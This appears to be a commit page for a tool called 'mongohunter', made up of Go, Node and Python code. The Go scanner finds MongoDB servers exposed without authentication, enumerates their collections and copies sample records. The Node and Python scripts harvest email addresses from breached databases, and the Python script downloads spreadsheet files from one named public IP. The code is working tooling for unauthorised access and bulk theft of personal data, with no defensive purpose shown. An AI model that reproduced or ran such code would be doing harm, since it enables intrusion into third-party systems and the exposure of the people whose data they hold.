...
 
Commits (2)
import ntpath
import re
from io import BytesIO
import gridfs
import pymongo as pym
from pandas import ExcelFile
def connectToDb():
client = pym.MongoClient('mongodb://14.143.82.24:27017/')
db = client.SMSSvatantra_Live
collectn = db.SMSSvatantra_Live
fs = gridfs.GridFS(db)
return db, collectn, fs
db, collectn, fs = connectToDb()
if __name__ == "__main__":
for file in db.fs.files.find({}, {"_id": 1, "filename": 1}):
filename = ntpath.basename(file["filename"])
print(filename)
if filename.endswith(".xls") or filename.endswith(".csv"):
print("Downloading ." + filename)
to_write = False
fobj = fs.get(file["_id"])
buff = fobj.read()
excel_data = ExcelFile(BytesIO(buff))
df = excel_data.parse(excel_data.sheet_names[-1])
csv = df.to_csv()
emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", csv)
if len(emails):
print(emails)
to_write = True
if to_write:
f = open("./data/" + filename, 'wb')
f.write(buff)
f.close()
const MongoClient = require('mongodb').MongoClient;
const url = "mongodb://localhost:27017/tik";
MongoClient.connect(url, (err, client) => {
if (err) throw err;
const db = client.db("tik");
const collection = db.collection("mongohunter");
collection.find({}).sort({"totalSize": -1}).toArray((err, result) => {
result.forEach(doc => {
let colls = Object.keys(doc["collections"]);
if (colls.length === 0) return;
const size = (doc["totalSize"] / (1024 * 1024 * 1024));
if (size < 1) return;
;
console.log("> " + doc["_id"]);
console.log("> Size : " + (size) + " GB");
Object.keys(doc["collections"]).forEach(k => {
let info = doc["collections"][k];
let emails = JSON.stringify(info).match(/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)/gi);
if (emails && emails.length && info["count"] > 1000) {
console.log(k, info["count"], emails);
}
});
// console.log(colls);
console.log("------------------------------------------------------------------------\n")
})
});
});
......@@ -77,24 +77,24 @@ func workDispatcher(ipAddr chan string, data chan string) {
}
}
var client *mongo.Client = nil;
var client *mongo.Client = nil
func getClient() (*mongo.Client) {
if (client == nil) {
func getClient() *mongo.Client {
if client == nil {
var err error
ctx, _ := context.WithTimeout(context.Background(), 10*time.Second)
client, err = mongo.Connect(ctx, options.Client().ApplyURI("mongodb://localhost:27017"))
if err != nil {
return nil;
return nil
}
println("Created new connection...")
// Check the connection
err = client.Ping(context.TODO(), nil)
return client;
return client
} else {
return client;
return client
}
}
......@@ -112,22 +112,65 @@ func testIP(input string, data chan string) {
//If we can list databases , we can read records to!
dbs, err := client.ListDatabases(context.TODO(), bson.D{{}})
local := getClient()
collection := local.Database("tik").Collection("mongohunter")
if err != nil {
if *verbose {
print("\r\033[K" + input + ": ")
println(err.Error())
}
println("\r\033[K" + input + " is Open")
filter := bson.M{"_id": bson.M{"$eq": input}}
updateOp := options.UpdateOptions{}
updateOp.SetUpsert(true)
_, _ = collection.UpdateOne(context.Background(),
filter,
bson.D{
{"$set", bson.D{
{"_id", input},
{"updated", time.Now()},
}},
{"$setOnInsert", bson.D{
{"created", time.Now()},
}},
}, &updateOp)
} else {
local := getClient()
//var result = bson.D{}
println("\r\033[K" + input + " is VULNERABLE:")
fmt.Printf("%v", dbs)
println("\n")
var collections = bson.D{}
for _, db := range dbs.Databases {
d := client.Database(db.Name)
col, _ := d.ListCollectionNames(context.TODO(), bson.D{{}})
for _, collection := range col {
//count, _ := d.Collection(collection).EstimatedDocumentCount(context.TODO(), nil)
var stat bson.M
_ = d.RunCommand(context.Background(), bson.M{"collStats": collection}).Decode(&stat)
doc := &bson.D{}
_ = d.Collection(collection).FindOne(context.TODO(), bson.D{{}}).Decode(&doc)
var n = db.Name + "~" + collection
if n != "local~startup_log" {
collections = append(collections, bson.E{
n, bson.D{
{"count", stat["count"]},
{"avg", stat["avgObjSize"]},
{"storage", stat["storageSize"]},
{"sample", doc},
},
})
}
}
}
//for db := range dbs.Databases {
//
//
//}
collection := local.Database("tik").Collection("mongohunter")
filter := bson.M{"_id": bson.M{"$eq": input}}
updateOp := options.UpdateOptions{}
updateOp.SetUpsert(true)
......@@ -136,7 +179,8 @@ func testIP(input string, data chan string) {
bson.D{
{"$set", bson.D{
{"_id", input},
{"dbs", dbs.Databases},
//{"dbs", dbs.Databases},
{"collections", collections},
{"totalSize", dbs.TotalSize},
{"updated", time.Now()},
}},
......@@ -144,18 +188,14 @@ func testIP(input string, data chan string) {
{"created", time.Now()},
}},
}, &updateOp)
fmt.Println("Updated info about " + input)
if *outFile != "null" {
data <- input
}
if err != nil {
fmt.Print(err)
return
}
println("\r\033[K" + input + " is VULNERABLE:")
fmt.Printf("%v", dbs)
println("\n")
if *outFile != "null" {
data <- input
}
}
client.Disconnect(context.TODO())
return
......